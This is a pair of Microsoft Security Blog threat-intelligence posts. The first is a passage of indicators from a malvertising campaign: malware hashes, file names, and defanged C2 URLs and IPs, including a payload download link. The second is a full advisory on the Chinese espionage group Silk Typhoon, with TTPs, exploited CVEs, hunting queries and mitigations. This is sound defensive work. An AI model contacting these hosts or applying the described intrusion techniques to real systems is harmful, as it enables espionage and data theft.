b3bfda8326802d17565f3d1ff6829ac05775ebc6d9ca2dcQUCvpZLobnhvno5v1t.exe4bac608722756c80c29fee6f73949c011ea78243e5267e86b7b20b3beeb79f9eEmilyHaiti.exe3221f1356a91d4f06d1deee988be04597cc11bc1cab199ba9c43b9d80dfa88bdPIPIPOO.exe15bf7a141a5a5e7e5c19ffbfbb5b781ae8db52d9ba5ffeb1364964580ed55b13ReliefOrganizational.exe02533f92d522d47b9d630375633803dd8d6b4723e87d914cd29460d404134a66HelloWorld.ps1670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c416485251.zip0997201124780f11a16662a0d718b1a3ef3202c5153191f93511d7ecd0de4d8d251.exe4b50e7fba5e33bac30b98494361d5ab725022c38271b3eb89b9c4aab457dca78

Fourth-stage AutoIT, NetSupport RAT, PowerShell, and Lumma

File name(s)SHA-256Korea.com
Fabric.com
Affiliated.com
Weeks.com
Briefly.com
Denmark.com
Tanzania.com
Cookies.com
Spice.com
SophieHub.scr
SpaceWarp.scr
SkillSync.scr
Quantify.scr
HealthPulse
CogniFlow.scr
ArgonautGuard.scr865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4Warrant.com
Ford.com
AutoIt3.exe
Seq.com
Underwear.com1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49Presentationhost.exe18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2derLX7UsT.ps12a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3675aff18abddc.exeadf5a9c2db09a782b3080fc011d45eb6eb597d8b475c3c27755992b1d7796e91675aff18abddc.vbs5f2b66cf3370323f5be9d7ed8a0597bffea8cc1f76cd96ebb5a8a9da3a1bdc71251.exe707a23dcd031c4b4969a021bc259186ca6fd4046d6b7b1aaffc90ba40b2a603b

Third-stage C2s

Indicator Typehxxp://keikochio[.]com/staz/gribs.zip C2hxxp://keikochio[.]com/incall.php?=compName=<computer name> C2hxxps://stocktemplates[.]net/input.php?compName=<computer name> C2hxxp://89.23.96[.]126/?v=3&event=ready&url=hxxp://188.245.94[.]250:443/auto/28cd7492facfd54e11d48e52398aefa7/251.exe C2

Fourth-stage C2s

Indicator Type 45.141.84[.]60 IP address91.202.233[.]18 IP address154.216.20[.]131 IP address5.10.250[.]240 IP address79.132.128[.]77 IP addresshxxps://shortlearn[.]clickURLhxxps://wrathful-jammy[.]cyouURLhxxps://mycomp[.]cyouURLhxxps://kefuguy[.]shopURLhxxps://lumdukekiy[.]shopURLhxxps://lumquvonee[.]shopURLhxxps://klipcatepiu0[.]shopURLhxxps://gostrm[.]shopURLhxxps://ukuhost[.]netURLhxxps://silversky[.]clubURLhxxps://pub.culture-quest[.]shopURLhxxps://se-blurry[.]bizURLhxxps://zinc-sneark[.]bizURLhxxps://dwell-exclaim[.]bizURLhxxps://formy-spill[.]bizURLhxxps://covery-mover[.]bizURLhxxps://dare-curbys[.]bizURLhxxps://impend-differ[.]bizURLhxxps://dreasd[.]xyzURLhxxps://ikores[.]sbsURLhxxps://violettru[.]clickURLhxxps://marshal-zhukov[.]comURLhxxps://tailyoveriw[.]myURL

Fourth-stage testing connectivity sites

Indicator Type hxxps://baidu.comURLhxxps://360.netURLhxxps://praxlonfire73.liveURL References Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

Hear more about this discovery and how threat actors in this campaign leverage trusted platforms and advanced techniques to achieve their malicious goals in this episode of the Microsoft Threat Intelligence podcast, hosted by Sherrod DeGrippo: https://thecyberwire.com/podcasts/microsoft-threat-intelligence/39/notes. To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Malvertising campaign leads to info stealers hosted on GitHub appeared first on Microsoft Security Blog.

Categories: Microsoft

Silk Typhoon targeting IT supply chain

Microsoft Malware Protection Center - Wed, 03/05/2025 - 6:00am

Executive summary:
Microsoft Threat Intelligence identified a shift in tactics by Silk Typhoon, a Chinese espionage group, now targeting common IT solutions like remote management tools and cloud applications to gain initial access. While they haven’t been observed directly targeting Microsoft cloud services, they do exploit unpatched applications that allow them to elevate their access in targeted organizations and conduct further malicious activities. After successfully compromising a victim, Silk Typhoon uses the stolen keys and credentials to infiltrate customer networks where they can then abuse a variety of deployed applications, including Microsoft services and others, to achieve their espionage objectives. Our latest blog explains how Microsoft security solutions detect these threats and offers mitigation guidance, aiming to raise awareness and strengthen defenses against Silk Typhoon’s activities.

Silk Typhoon is an espionage-focused Chinese state actor whose activities indicate that they are a well-resourced and technically efficient group with the ability to quickly operationalize exploits for discovered zero-day vulnerabilities in edge devices. This threat actor holds one of the largest targeting footprints among Chinese threat actors. Part of this is due to their opportunistic nature of acting on discoveries from vulnerability scanning operations, moving quickly to the exploitation phase once they discover a vulnerable public-facing device that they could exploit.

As a result, Silk Typhoon has been observed targeting a wide range of sectors and geographic regions, including but not limited to information technology (IT) services and infrastructure, remote monitoring and management (RMM) companies, managed service providers (MSPs) and affiliates, healthcare, legal services, higher education, defense,  government, non-governmental organizations (NGOs), energy, and others located in the United States and throughout the world.

Silk Typhoon has shown proficiency in understanding how cloud environments are deployed and configured, allowing them to successfully move laterally, maintain persistence, and exfiltrate data quickly within victim environments. Since Microsoft Threat Intelligence began tracking this threat actor in 2020, Silk Typhoon has used a myriad of web shells that allow them to execute commands, maintain persistence, and exfiltrate data from victim environments.

As with any observed nation-state threat actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to secure their environments. We’re publishing this blog to raise awareness of Silk Typhoon’s recent and long-standing malicious activities, provide mitigation and hunting guidance, and help disrupt operations by this threat actor.

Recent Silk Typhoon activity Supply chain compromise

Since late 2024, Microsoft Threat Intelligence has conducted thorough research and tracked ongoing attacks performed by Silk Typhoon. These efforts have significantly enhanced our understanding of the actor’s operations and uncovered new tradecraft used by the actor. In particular, Silk Typhoon was observed abusing stolen API keys and credentials associated with privilege access management (PAM), cloud app providers, and cloud data management companies, allowing the threat actor to access these companies’ downstream customer environments. Companies within these sectors are possible targets of interest to the threat actor. The observations below were observed once Silk Typhoon successfully stole the API key:

  • Silk Typhoon used stolen API keys to access downstream customers/tenants of the initially compromised company.
  • Leveraging access obtained via the API key, the actor performed reconnaissance and data collection on targeted devices via an admin account. Data of interest overlaps with China-based interests, US government policy and administration, and legal process and documents related to law enforcement investigations.
  • Additional tradecraft identified included resetting of default admin account via API key, web shell implants, creation of additional users, and clearing logs of actor-performed actions.
  • Thus far the victims of this downstream activity were largely in the state and local government, and the IT sector.
Password spray and abuse

Silk Typhoon has also gained initial access through successful password spray attacks and other password abuse techniques, including discovering passwords through reconnaissance. In this reconnaissance activity, Silk Typhoon leveraged leaked corporate passwords on public repositories, such as GitHub, and were successfully authenticated to the corporate account. This demonstrates the level of effort that the threat actor puts into their research and reconnaissance to collect victim information and highlights the importance of password hygiene and the use of multifactor authentication (MFA) on all accounts.

Silk Typhoon TTPs Initial access

Silk Typhoon has pursued initial access attacks against targets of interest through development of zero-day exploits or discovering and targeting vulnerable third-party services and software providers. Silk Typhoon has also been observed gaining initial access via compromised credentials. The software or services targeted for initial access focus on IT providers, identity management, privileged access management, and RMM solutions.

In January 2025, Silk Typhoon was also observed exploiting a zero-day vulnerability in the public facing Ivanti Pulse Connect VPN (CVE-2025-0282). Microsoft Threat Intelligence Center reported the activity to Ivanti, which led to a rapid resolution of the critical exploit, significantly reducing the period that highly skilled and sophisticated threat actors could leverage the exploit.

Lateral movement to cloud

Once a victim has been successfully compromised, Silk Typhoon is known to utilize common yet effective tactics to move laterally from on-premises environments to cloud environments. Once the threat actor has gained access to an on-premises environment, they look to dump Active Directory, steal passwords within key vaults, and escalate privileges. Furthermore, Silk Typhoon has been observed targeting Microsoft AADConnect servers in these post-compromise activities. AADConnect (now Entra Connect) is a tool that synchronizes on-premises Active Directory with Entra ID (formerly Azure AD). A successful compromise of these servers could allow the actor to escalate privileges, access both on-premises and cloud environments, and move laterally.

Manipulating service principals/applications

While analyzing post-compromise tradecraft, Microsoft identified Silk Typhoon abusing service principals and OAuth applications with administrative permissions to perform email, OneDrive, and SharePoint data exfiltration via MSGraph. Throughout their use of this technique, Silk Typhoon has been observed gaining access to an application that was already consented within the tenant to harvest email data and adding their own passwords to the application. Using this access, the actors can steal email information via the MSGraph API. Silk Typhoon has also been observed compromising multi-tenant applications, potentially allowing the actors to move across tenants, access additional resources within the tenants, and exfiltrate data.

If the compromised application had privileges to interact with the Exchange Web Services (EWS) API, the threat actors were seen compromising email data via EWS.

In some instances, Silk Typhoon was seen creating Entra ID applications in an attempt to facilitate this data theft. The actors would typically name the application in a way to blend into the environment by using legitimate services or Office 365 themes.

Use of covert networks

Silk Typhoon is known to utilize covert networks to obfuscate their malicious activities. Covert networks, tracked by Microsoft as “CovertNetwork”, refer to a collection of egress IPs consisting of compromised or leased devices that may be used by one or more threat actors. Silk Typhoon was observed utilizing a covert network that is comprised of compromised Cyberoam appliances, Zyxel routers, and QNAP devices. The use of covert networks has become a common tactic among various threat actors, particularly Chinese threat actors.

Historical Silk Typhoon zero-day exploitation

Since 2021, Silk Typhoon has been observed targeting and compromising vulnerable unpatched Microsoft Exchange servers, GlobalProtect Gateway on Palo Alto Networks firewalls, Citrix NetScaler appliances, Ivanti Pulse Connect Secure appliances, and others. While not exhaustive, below are historical zero-day vulnerabilities that Silk Typhoon was observed compromising for initial access into victim environments.

GlobalProtect Gateway on Palo Alto Networks Firewalls

In March 2024, Silk Typhoon used a zero-day exploit for CVE-2024-3400 in GlobalProtect Gateway on Palo Alto Networks firewalls to compromise multiple organizations:

  • CVE-2024-3400 – A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Citrix NetScaler ADC and NetScaler Gateway

In early 2024, Microsoft began to observe Silk Typhoon compromising zero-day vulnerabilities within Citrix NetScaler ADC and NetScaler Gateways:

  • CVE-2023-3519 – An unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway
Microsoft Exchange Servers

In January 2021, Microsoft began to observe Silk Typhoon compromising zero-day vulnerabilities in Microsoft Exchange Servers. Upon discovery, Microsoft addressed those issues and issued security updates along with related guidance (related links below):

  • CVE-2021-26855 – A server-side request forgery (SSRF) vulnerability in Exchange that could allow an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
  • CVE-2021-26857 – An insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave Silk Typhoon the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to be exploited.
  • CVE-2021-26858 – A post-authentication arbitrary file write vulnerability in Exchange. If Silk Typhoon could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator’s credentials.
  • CVE-2021-27065 – A post-authentication arbitrary file write vulnerability in Exchange. If Silk Typhoon could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator’s credentials.

During recent activities and historical exploitation of these appliances, Silk Typhoon utilized a variety of web shells to maintain persistence and to allow the actors to remotely access victim environments.

Hunting guidance

To help mitigate and surface various aspects of recent Silk Typhoons activities, Microsoft recommends the following:

  • Inspect log activity related to Entra Connect serversfor anomalousactivity.
  • Where these targeted applications have highly privileged accounts, inspect service principals for newly created secrets (credentials).
  • Identify and analyze any activity related to newly created applications.
  • Identify all multi-tenant applications and scrutinize authentications to them.
  • Analyze any observed activity related to use of Microsoft Graph or eDiscovery particularly for SharePoint or email data exfiltration
  • Look for newly created users on devices impacted by vulnerabilities targeted by Silk Typhoon and investigate virtual private network (VPN) logs for evidence of VPN configuration modifications or sign-in activity during the possible window of compromise of unpatched devices.
Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel customers can use the following queries to detect behavior associated with Silk Typhoon:

Customers can use the following query to detect vulnerabilities exploited by Silk Typhoon:

DeviceTvmSoftwareVulnerabilities | where CveId in ("CVE-2025-0282") | project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion, CveId,VulnerabilitySeverityLevel | join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId | project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion, CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware Recommendations

To help detect and mitigate Silk Typhoon’s activity, Microsoft recommends the following:

  • Ensure all public facing devices are patched. It’s important to note that patching a vulnerable device does not remediate any post-compromise activities by a threat actor who gained privileged access to a vulnerable device.
  • Validate any Ivanti Pulse Connect VPN are patched to address CVE-2025-0282 and run the suggested Integrity Checker Tool as suggested in their Advisory. Consider terminating any active or persistent sessions following patch cycles.
  • Defend against legitimate application and service principal abuse by establishing strong controls and monitoring for these security identities. Microsoft recommends the following mitigations to reduce the impact of this threat:
    • Audit the current privilege level of all identities, users, service principals, and Microsoft Graph Data Connect applications (use the Microsoft Graph Data Connect authorization portal) to understand which identities are highly privileged. Scrutinize privileges more closely if they belong to an unknown identity, belong to identities that are no longer in use, or are not fit for purpose. Admins may assign identities privileges over and above what is required. Defenders should pay attention to apps with app-only permissions as those apps might have over-privileged access. Read additional guidance for investigating compromised and malicious applications.
    • Identify abused OAuth apps using anomaly detection policies. Detect abused OAuth apps that make sensitive Exchange Online administrative activities through App governance. Investigate and remediate any risky OAuth apps.
    • Review any applications that hold EWS.AccessAsUser.All and EWS.full_access_as_app permissions and understand whether they are still required in the tenant. If they are no longer required, they should be removed.
    • If applications must access mailboxes, granular and scalable access can be implemented using role-based access control for applications in Exchange Online. This access model ensures applications are only granted to the specific mailboxes required.
  • Monitor for service principal sign-ins from unusual locations. Two important reports can provide useful daily activity monitoring:
    • The risky sign-ins report surfaces attempted and successful user access activities where the legitimate owner might not have performed the sign-in. 
    • The risky users report surfaces user accounts that might have been compromised, such as a leaked credential that was detected or the user signing in from an unexpected location in the absence of planned travel. 
  • Defend against credential compromise by building credential hygiene, practicing the principle of least privilege, and reducing credential exposure. Microsoft recommends the following mitigations to reduce the impact of this threat.
  • Implement the Azure Security Benchmark and general best practices for securing identity infrastructure, including:
    • Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.
    • Ensure that “break glass” account passwords are stored offline and configure honey-token activity for account usage.
    • Implement Conditional Access policies enforcing Microsoft’s Zero Trust principles.
  • Enable risk-based user sign-in protection and automate threat response to block high-risk sign-ins from all locations and enable multifactor authentication (MFA) for medium-risk ones.
  • Ensure that VPN access is protected using modern authentication methods.
  • Identify all multi-tenant applications, assess permissions, and investigate suspicious sign-ins.
Indicators of compromise

Silk Typhoon is not known to use their own dedicated infrastructure in their operations. Typically, the threat actor uses compromised covert networks, proxies, and VPNs for infrastructure, likely to obfuscate their operations. However, they have also been observed using short-lease virtual private server (VPS) infrastructure to support their operations.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

  • Silk Typhoon activity group

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

  • Possible exploitation of Exchange Server vulnerabilities
  • Suspicious web shell detected
  • Suspicious Active Directory snapshot dump
  • Suspicious credential dump from NTDS.dit
Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate associated threat activity:

  • Suspicious Interactive Logon to the Entra Connect Server
  • Suspicious writeback by Entra Connect on a sensitive user
  • User Password Reset by Entra Connect Account
  • Suspicious Entra sync password change
Microsoft Defender XDR

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

  • Suspicious activities related to Azure Key Vault by a risky user
Microsoft Defender for Cloud

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

  • Unusual user accessed a key vault
  • Unusual application accessed a key vault
  • Access from a suspicious IP to a key vault
  • Denied access from a suspicious IP to a key vault
Microsoft Defender for Cloud Apps

The following Microsoft Defender for Cloud Apps alerts can indicate associated threat activity if app governance is enabled:

  • Unusual addition of credentials to an OAuth app
  • Suspicious credential added to dormant app
  • Unused app newly accessing APIs
  • App with suspicious metadata has Exchange permission
  • App with an unusual user agent accessed email data through Exchange Web Services
  • App with EWS application permissions accessing numerous emails
  • App made anomalous Graph calls to Exchange workload post certificate update or addition of new credentials
  • Suspicious user created an OAuth app that accessed mailbox items
  • Suspicious OAuth app used for collection activities using Graph API
  • Risky user updated an app that accessed Email and performed Email activity through Graph API
  • Suspicious OAuth app email activity through Graph API
  • Suspicious OAuth app email activity through EWS API
Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

  • CVE-2021-26855
  • CVE-2021-26857
  • CVE-2021-26858
  • CVE-2021-27065
Microsoft Defender External Attack Surface Management

Attack Surface Insights with the following title can indicate vulnerable devices on your network but is not necessarily indicative of exploitation:

  • [Potential] CVE-2024-3400 – Palo Alto Networks PAN-OS Command Injection Vulnerability’
  • [Potential] CVE-2023-3519 – Citrix NetScaler ADC and Gateway Unauthenticated
  • ProxyLogon – Microsoft Exchange Server Vulnerabilities (Hotfix Available)

Note: An Attack Surface Insight marked as [Potential] indicates a service is running but cannot validate whether that service is running a vulnerable version. Customers should check resources to verify that they are up to date as part of their investigation.

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article (see Threat intelligence reports below)
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Silk Typhoon targeting IT supply chain appeared first on Microsoft Security Blog.

Categories: Microsoft